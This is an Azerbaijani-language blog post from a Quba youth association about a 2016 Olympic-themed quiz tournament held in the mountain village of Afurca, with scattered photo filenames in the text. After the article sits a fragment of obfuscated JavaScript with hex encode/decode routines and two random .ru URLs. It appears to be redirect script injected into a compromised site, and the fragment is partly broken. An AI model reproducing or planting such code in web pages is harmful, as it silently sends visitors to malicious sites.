Olimpiya hərəkatı Qubanın dağ kəndinə qədər qalxdı

13319786_856902717748231_7871284557559972588_nAzərbaycan Respublikasının Prezidenti yanında Qeyri-Hökumət Təşkilatlarına Dövlət Dəstəyi Şurasının maliyyə vəsaiti ilə Qubada fəaliyyət göstərən “Yurd” Gənclərin İntellektual İnkişafına Dəstək İctimai Birliyi tərəfindən icra edilən “Olimpiya mükafatçıları milli sərvətimizdir!-Rio-2016-ya ictimai dəstək” layihəsi davam edir.

13393911_856902564414913_7231989889810379542_nLayihə çərçivəsində “Olimpiya intellekt kuboku” adlı növbəti turnir ilk dəfə olaraq ucqar dağ kəndində baş tutub. Quba şəhər mərkəzindən 40 km uzaqlıqda, dağlar qoynunda yerləşən Afurca kəndində keçirilən tədbirdə çıxış edən təşkilatın sədri Ramin Mahmudov son illərdə ölkəmizin əldə etdiyi idman 13406968_856902404414929_2134973323702844570_nnailiyyətlərindən danışıb, cənab Prezident İlham Əliyevin Milli Olimpiya Komitəsinə prezident seçildikdən sonra ölkəmizin dünyanın idman ölkəsinə çevrildiyini qeyd edib. Bunun da nəticəsində yetişməkdə olan gənc nəsil arasında sağlam həyat tərzinin təbliğinin, onların idmana olan marağının artırılmasının günün prioritet istiqamətlərindən biri 13407044_856902881081548_332398384761195199_nolduğunu bildirib. Eyni zamanda idmanın multikultural dəyərlərin, tolerantlığın dünyaya təbliğ edilməsi baxımından da əhəmiyyətindən danışan layihə rəhbəri bu ilin ölkəmizdə “Multikulturalizm ili” elan edilməsini də diqqətə çatdırıb.

Layihənin əsas məqsədinin region gəncləri arasında idmana olan 13417424_856902587748244_1986747051467447159_nmarağın artırılması, ölkəmizin idman nailiyyətlərinin gənc nəsil arasında təbliğ edilməsi və avqust ayında start götürəcək Braziliyanın Rio-de-Janeyro şəhərindəki olimpiya oyunlarında idmançılarımıza ictimai dəstəyin verilməsi olduğunu, xüsusilə də ötən il I Avropa Oyunlarının möhtəşəm 13417672_856902024414967_2210044714355523359_ntəşkilatçılığının əhəmiyyətini vurğulayan natiq bildirib ki, ölkəmizdə bir-birinin ardınca təşkil edilən müxtəlif idman turnirləri Azərbaycanımızın haqq səsinin dünyaya çatdırılması, həqiqətlərinin dünyaya bəyan edilməsi istiqamətində müstəsna əhəmiyyətə malikdir.

13445802_856903951081441_8198929826971648562_nNatiq bu kimi tədbirlərin gənclərin sağlam ruhda tərbiyə edilməsi istiqamətində böyük əhəmiyyətini qeyd edib, eyni zamanda Azərbaycanımızın dünyada artan nüfuzunun, idman nailiyyətlərinin gənc nəsil arasında təbliğinin vətənpərvərlik, dövlətçilik və vətənə sədaqət ruhunda tərbiyə edilməsində vacib amil olduğunu bildirib.

13445675_856904237748079_171454618247217315_nQuba rayon Gənclər və İdman İdarəsinin rəis müavini Mənsur Ağayev, eləcə də Afurca kənd tam orta məktəbinin direktoru Hikmət Hüseynov bu kimi tədbirlərin yetişməkdə olan gənc nəslin vətənpərvərlik, vətəndaşlıq, dövlətçilik və dünyəvilik ruhunda tərbiyə edilməsi istiqamətindəki əhəmiyyətini qeyd ediblər. Ölkəmizdə gənclərin inkişafının prioritet olduğunu diqqətə çatdıran natiqlər bu tədbirin dağlar qoynunda yerləşən Afurcada keçirilməsinin də dövlətimizin gəncliyə, təhsilə qayğısının bariz nümunəsi olduğunu bildiriblər.

Rəsmi açılış mərasimindən sonra turnirə start verilib.

6 komanda  30 sualdan ibarət Nə? Harada? Nə zaman? oyunu üzrə mübarizə aparıb. Yekunda “Land of Fire” biliciləri hədəflərinə çataraq turnirin qalibi adını qazanıblar. “Günəş” komandası ikinci, “Məşəl” komandası isə üçüncü yeri tutub.

Yekunda qalib və mükafatçılara layihə çərçivəsində təşkilatçılar tərəfindən hazırlanmış diplomlar, xüsusi bukletlər, kubok və medallar, “Azərbaycan idmançıları olimpiadalarda” adlı statistik məlumatların əks olunduğu kitabça təqdim olunub.

Qeyd edək ki, layihə çərçivəsində bu günə qədər Quba rayonunun Püstəqasım kəndində stolüstü tennis, Dağlı kəndində qızlar arasında voleybol, Qaraçay kəndində isə oğlanlar arasında 3*3 basketbol növü üzrə idman yarışları, Qımılqışlaq və Talabıqışlaq kəndlərində isə intellektual turnir keçirilib.

Avqust ayınadək davam edəcək layihənin ikinci mərhələsində Quba rayonunun Rustov kəndində intellektal oyunlar üzrə “Olimpiya intellect kuboku” turnirləri, Quba şəhərində isə istedadlı gənclərin əl işlərindən ibarət “Olimpiya oyunları gənc rəssamların təxəyyülündə” adlı sərgi də təşkil olunacaq.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "yurdgencler.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s